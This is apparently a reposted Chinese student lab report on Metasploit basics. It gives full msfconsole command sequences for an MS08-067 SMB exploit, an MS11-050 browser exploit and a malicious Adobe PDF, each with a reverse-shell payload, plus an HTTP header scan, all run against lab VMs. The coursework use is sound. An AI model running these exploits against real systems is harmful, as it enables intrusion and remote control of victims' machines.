2018-2019 20165208 网络对抗 Exp5 MSF基础

最新推荐文章于 2024-08-02 17:51:49 发布
最新推荐文章于 2024-08-02 17:51:49 发布
阅读量213 收藏 1
点赞数 1
文章标签: 运维 网络 操作系统
原文链接:http://www.cnblogs.com/KY-high/p/10698062.html
版权

目录

2018-2019 20165208 网络对抗 Exp5 MSF基础

实验内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,如ms08_067; (1分)

1.2 一个针对浏览器的攻击,如ms11_050;(1分)

1.3 一个针对客户端的攻击,如Adobe;(1分)

1.4 成功应用任何一个辅助模块。(0.5分)

1.5 报告评分(1分)

基础问题回答

用自己的话解释什么是exploit,payload,encode.

  • exploit:指由攻击者利用安全漏洞,将负责攻击的代码payload传送到靶机中。
  • payload:是target在被渗透攻击之后去执行的恶意代码,如ex1的shellcode。
  • encode:进行编码改变payload形态,使其不出现特定字符。

实践过程记录

1.一个主动攻击实践,如ms08_067;

 ①攻击机:kali IP:192.168.119.128
 
②靶机:windows XP SP3(English) IP:192.168.119.129(失败)

②靶机:windows 2000 Professional(English) IP:192.168.119.130(成功)
  • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
    • msf > use exploit/windows/smb/ms08_067_netapi//使用ms08_067漏洞,use后其实是漏洞所在目录路径名
    • msf exploit(ms08_067_netapi) > show payloads//显示回连攻击载荷
    • msf exploit(ms08_067_netapi) > set payload
    • generic/shell_reverse_tcp //tcp反向回连
    • msf exploit(ms08_067_netapi) > set LHOST 192.168.119.128 //攻击机ip
    • msf exploit(ms08_067_netapi) > set LPORT 5208 //攻击端口
    • msf exploit(ms08_067_netapi) > set RHOST 192.168.119.129 //靶机ip,特定漏洞端口已经固定
    • msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高
    • msf exploit(ms08_067_netapi) > exploit //攻击

  • 建立会话,攻击失败显示如下:
    1283587-20190412191048509-1941599669.png

  • 通过网上查找资料,发现可能是打过补丁的原因,更换虚拟机。
  • 选择靶机windows 2000 Professional(English)。

  • 按上述命令进行操作,记得更换IP。
    1283587-20190412191309539-289094698.png

  • 显示监听成功,dir命令成功。
    1283587-20190412191339685-765176662.png

2. 一个针对浏览器的攻击,如ms11_050;

①攻击机:kali IP:192.168.119.128

②靶机:windows 7 x64 IP:192.168.119.131 IE:8.0(失败)

②靶机:windows Sever 2008  IP:192.168.119.132(成功)

  • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

    • msf > use windows/browser/ms11_050_mshtml_cobjectelement//使用浏览器ms11_050漏洞
    • msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
    • msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.119.128 //攻击机ip
    • msf exploit(ms11_050_cobjectelement) > set LPORT 5208 //攻击端口固定
    • msf exploit(ms11_050_cobjectelement) > set URIPATH 5208ky //统一资源标识符路径设置
    • msf exploit(ms11_050_cobjectelement) > exploit

  • 运行靶机浏览器,这时win7出现DNS服务器未响应,尝试解决无果后,更换了虚拟机。
    1283587-20190412191532770-132957560.png

  • 操作同上
    1283587-20190412191508237-1219067983.png

  • 在访问http://192.168.119.128:8080/5208ky时,可见攻击机出现访问信息。
    1283587-20190412192300816-258020090.png
    1283587-20190412191439499-1282713634.png

3. 一个针对客户端的攻击,如Adobe;

①攻击机:kali IP:192.168.119.128

②靶机:windows XP sp2 IP:192.168.119.133 

Adobe:9.3

  • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

    • `msf > use windows/fileformat/adobe_cooltype_sing
    • msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp` //tcp反向回连
    • msf exploit(adobe_cooltype_sing) > set LHOST 192.168.119.128 //攻击机ip
    • msf exploit(adobe_cooltype_sing) > set LPORT 5208 //攻击端口
    • msf exploit(adobe_cooltype_sing) > set FILENAME 20165208.pdf //设置生成pdf文件的名字
    • msf exploit(adobe_cooltype_sing) > exploit //攻击

  • 成功生成20165208.pdf。
    1283587-20190412192328471-593978924.png

  • 将pdf文件传送或拷贝到靶机上后,在kali上输入back退出当前模块,进入监听模块,输入以下命令:

    • msf > use exploit/multi/handler //进入监听模块
    • msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
    • msf exploit(handler) > set LHOST 192.168.119.128 //攻击机ip
    • msf exploit(handler) > set LPORT 5208 //攻击端口固定
    • msf exploit(handler) > exploit

  • 然后在靶机上打开20165208.pdf文件。
    1283587-20190412192336175-639781367.png

  • kali连接成功。
    1283587-20190412192409787-1265976616.png

  • 攻击机运行ipconfig命令,可显示靶机IP地址。
    1283587-20190412192427184-1412514885.png

  • 靶机关闭pdf文件,则失去权限。
    1283587-20190412192429872-634128314.png

4. 成功应用任何一个辅助模块(scanner/http/http_header 唯一)

  • 使用命令msf > show auxiliary查看所有的辅助模块
    1283587-20190412192540611-1269331746.png

  • 在看的时候我试了几个,因为好多命令的描述我不能准确的定位到它功能,最后我选择了scanner/http/http_header

  • info scanner/http/http_header查看命令相关信息。
    1283587-20190412192556590-363893429.png

  • 我们可以看到它的描述: This module shows HTTP Headers returned by the scanned systems。我最初以为它是给我返回浏览器的头部信息,也就是可以监听对方访问网页浏览的是什么。

  • 实际操作:首先use scanner/http/http_header调用模块,然后根据info得出的参数信息对参数进行设定

use scanner/http/http_header
set RHOSTS 192.168.119.132
RHOSTS => 192.168.119.132
set HTTP_METHOD GET
set RPORT 8080
exploit

set RPORT 80
exploit

1283587-20190412192614687-2000169655.png

  • 在端口80监听时我们可以看到返回信息Microsoft-IIS/7.0
  • 可以得出结论:目标计算机80端口上运行着IIS 7.0,

而在历年的IIS版本漏洞中,IIS 6.0、IIS 5.1、IIS 7.5和IIS 7.0受影响的漏洞数居前四位。同时我们可以大概根据IIS 7.0 判断出它的操作系统版本为Win 200或Vista全系列 。这和我们的靶机系统也是匹配的。

IIS版本系统版本受影响漏洞数量
IIS 5.0Windows 200010
IIS 5.1Windows XP 系列16
IIS 7.0Win 2008、Vista全系列11
IIS 10.0Win 10和Win 20162

实验中遇到的问题及解决方法

1.问题:在主动攻击实践时,操作完exploit后显示 Exploit completed, but no session was created.
1283587-20190412192632305-791354998.png

查了资料后我做了以下几个修改尝试:

我最初设的target参数是0,即自动选择目标系统类型。在尝试解决时我选了设为6。想说会不会这样的匹配度更合适,失败了。
1283587-20190412192638830-2095943143.png
1283587-20190412192701976-7326635.png

后来找到过程中看到有说可能是系统打了补丁,使攻击难以进行。所以就选择更换了虚拟机。
1283587-20190412192707780-731406920.png
1283587-20190412192726539-471346445.png

2.问题:在进行针对浏览器的攻击时,靶机显示无法显示该网页。进行诊断后提示是DNS服务器未响应。
1283587-20190412192748674-220076912.png

根据网络诊断提示DNS服务器未响应,我进行了三种尝试,分别如下:
1283587-20190412192803554-1262804082.png
1283587-20190412192807232-1009032755.png
1283587-20190412192810512-2074192060.png

不过,so sad,失败了,最后选择更换为win 2008虚拟机。

离实战还缺些什么技术或步骤?

现在的操作限定条件较多,对靶机,对版本,对补丁都多有要求,而对于更接近现实的攻击情况而言,自己的能力还有限,对于代码编写类的依赖已有教程的情况比较多,也就决定了攻击可能已经被破解,从而达不到既定的要求。

实验感想

本次实验对MSF做了简单的试操作,在找到合适的虚拟机后实验还是相对清晰、简单的。在这个过程中,学会查找很主要,infoshow targetsshow payloads等命令都帮了我不少忙。在整个实验中第四个模块是我独立完成的,网络上有关我选的这个命令的直接使用教程还是蛮少的,但是可以发现很多其他的例子。举一反三,怀着未知的忐忑去尝试成功后还是蛮有成就感的。

转载于:https://www.cnblogs.com/KY-high/p/10698062.html

weixin_34404393
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2019-0708RDP MSF攻击套件.rar
11-14
CVE-2019-0708RDP MSF攻击套件亲测可用,欢迎下载
CVE-2018-2883漏洞利用程序msf
03-27
针对CVE-2018-2883漏洞,Metasploit社区已经开发了一个专门的利用模块,即“msf”模块。通过这个模块,用户可以轻松地对目标系统进行漏洞扫描和利用。具体步骤如下: 1. **配置Metasploit**: 首先确保安装了最新...
2018-2019-2 网络对抗技术 20165334 Exp 8 Web基础
weixin_34351321的博客
05-11 176
2018-2019-2 网络对抗技术Exp8:Web基础 一.原理与实践说明 1.本实践的具体要求有: (1).Web前端HTML(0.5分) 能正常安装、启停Apache。理解HTML,理解表单,理解GET与POST方法,编写一个含有表单的HTML。 (2).Web前端javascipt(0.5分) 理解JavaScript的基本功能,理解DOM。编写JavaScript验证用户名、密码的规则。...
2018-2019-2 20162318《网络攻防技术》Exp5 MSF基础应用
weixin_30408165的博客
04-21 134
1.实验内容 1.一个主动攻击实践,如ms08_067 2. 一个针对浏览器的攻击,如ms11_050) 3. 一个针对客户端的攻击,如Adobe 4. 成功应用任何一个辅助模块 2.基础问题回答 2.1 用自己的话解释什么是exploit,payload,encode. exploit:利用漏洞,将攻击代码传送到靶机上,并对靶机进行一系列控制操作的整个过程。 payload:执行的...
2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 20165326
04-20 296
Exp5 MSF基础应用 实践内容 主动攻击实践 ms17_010_enternalblue 靶机:win7 x64成功 针对浏览器的攻击 ms14_064_ole_code_execution 靶机:winXP成功 靶机:win7失败 针对客户端的攻击 adobe_cooltype_sing 靶机:winXP成功 ms15_020_shortcut_icon_dllload...
20145329 《网络对抗技术》MS08_067远程漏洞攻击
dgflxcwno867930904的博客
04-16 162
MS08_067远程漏洞攻击:shell 实现攻击的前提是:攻击机和靶机在同一个网段下,首先将kali的ip改为与winxp的ip一样,二者能ping通 两台虚拟机: kali ip:192.168.10.129 windows xp sp3:192.168.10.128 1.kali打开msfconsole控制台 2.在msf模式下查找ms08_067的漏洞攻击程序 3."use...
Metasploit服务扫描(HTTP、MYSQL)
robacco的博客
03-19 940
利用Metasploit Scanner辅助模块自动化服务扫描 搜索你要扫描的服务模块,然后使用该模块,这里以http为例: search http_version use auxiliary/scanner/http/http_version show options 接着设置目标的IP,即你要扫描的目标系统(可以是整个局域网下的所有主机),然后run一下,开始扫描,下面是扫描结果: ...
2018-2019 20165221 网络对抗 Exp5 MSF基础
weixin_30435261的博客
04-20 134
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 一个主动攻击实践,如ms08_067; (1分 一个针对浏览器的攻击,如ms11_050;(1分) 一个针对客户端的攻击,如Adobe;(1分) 成功应用任何一个辅助模块。(0.5分) 具体实验操作 攻击机(kal...
CVE-2018-8897
08-01
CVE-2018-8897 Exp, 我在Windows 2008 R2 测试成功1次,失败3次,其他系统没有测试过
CVE-2018-8174-msf:CVE-2018-8174-VBScript内存损坏漏洞利用
05-17
CVE-2018-8174-MSF 这是一个metasploit模块,该模块创建恶意的Word文档以利用CVE-2018-8174-VBScript内存损坏漏洞。 该模块是一个非常快速的端口,并使用在野外发现的漏洞利用示例。 该漏洞仅适用于32位Microsoft ...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
OpenSSH是一种广泛使用的安全工具,它提供了在不同主机之间进行安全远程登录和其他相关网络服务的功能。然而,随着时间的推移,OpenSSH可能会发现安全漏洞,这可能导致恶意攻击者利用这些弱点对系统进行入侵或数据...
2017-2018-2 20155228 《网络对抗技术》 实验五:MSF基础应用
weixin_30823227的博客
04-27 292
2017-2018-2 20155228 《网络对抗技术》 实验五:MSF基础应用 1. 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 1.1 一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050;(1分) 1.3 一个针对客户端的攻击,如Adobe;(1分) 1.4 成功应用任何一个辅助模...
nodejs项目
weixin_70751365的博客
07-31 914
一、基于域名配置server一、基于域名配置server1.一个配置文件一般只有一个http模块2.一个http模块可以有多个server模块3.一个server模块就是一套web项目4.一个server模块中可以有多个location就是项目中的url路由第一步mkdir/zhangmin第二部echo第三步vim第三步http{server{listen80;第四步vim/etc/hosts10curl。
【Vulnhub系列】Vulnhub Connect-The-Dots 靶场渗透(原创)
Lusen的博客
08-02 296
Vulnhub系列Connect-The-Dots靶场做题记录
二进制部署k8s集群之master节点和etcd数据库集群(上)
zx52306的博客
07-30 1157
【代码】二进制部署k8s集群之master节点和etcd数据库集群(上)
MHA高可用配置及故障切换
最新发布
m0_70627741的博客
08-02 1035
HMA(MasterHigh Availablity)是一套优秀的Mysql高可用环境下的故障切换和主从复制的软件解决MySLQ单点的问题MySQL故障切换过程中,MHA能做到0-30秒内自动完成故障切换操作。故障切换的过程中最大程度上保证数据的一致性,以达到真正意义上的高可用。MHA是建在主从复制的基础上的;0-30秒自动完成故障切换是MHA的特性。
NGINX负载聚能
weixin_65451617的博客
07-30 539
一、负载均衡服务器集群:一组协同工作的服务器,它们共同对外提供服务,看起来就像是一个单独的服务器。分发策略:负载均衡器根据预设的规则或算法(如轮询、最少连接数、源IP地址哈希等),将来自客户端的请求分发给服务器集群中的某个服务器。健康检查:负载均衡器会定期检查后端服务器的健康状态(如CPU使用率、内存使用率、响应时间等),以确保只将请求分发给正常工作的服务器。会话保持(Session Persistence):对于需要保持会话状态的应用,负载均衡器可以确保来自同一客户端的请求被发送到同一台服务器上,以维护会
Docker容器下面home assistant忘记账号密码怎么重置?
本博客,博文仅代表个人操作经验,不能完全解决你的问题,仅供参考,佛系回复。
07-30 347
docker ha。
MSF基础与团队模型详解:原则、应用与CMMI比较
MSF(Microsoft Solution Framework)是一种由微软提出的项目管理和软件开发框架,旨在提供一套结构化的方法来指导项目的成功实施。其基本原则与团队模型是MSF的核心组成部分,涵盖了项目管理的关键要素。 首先,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值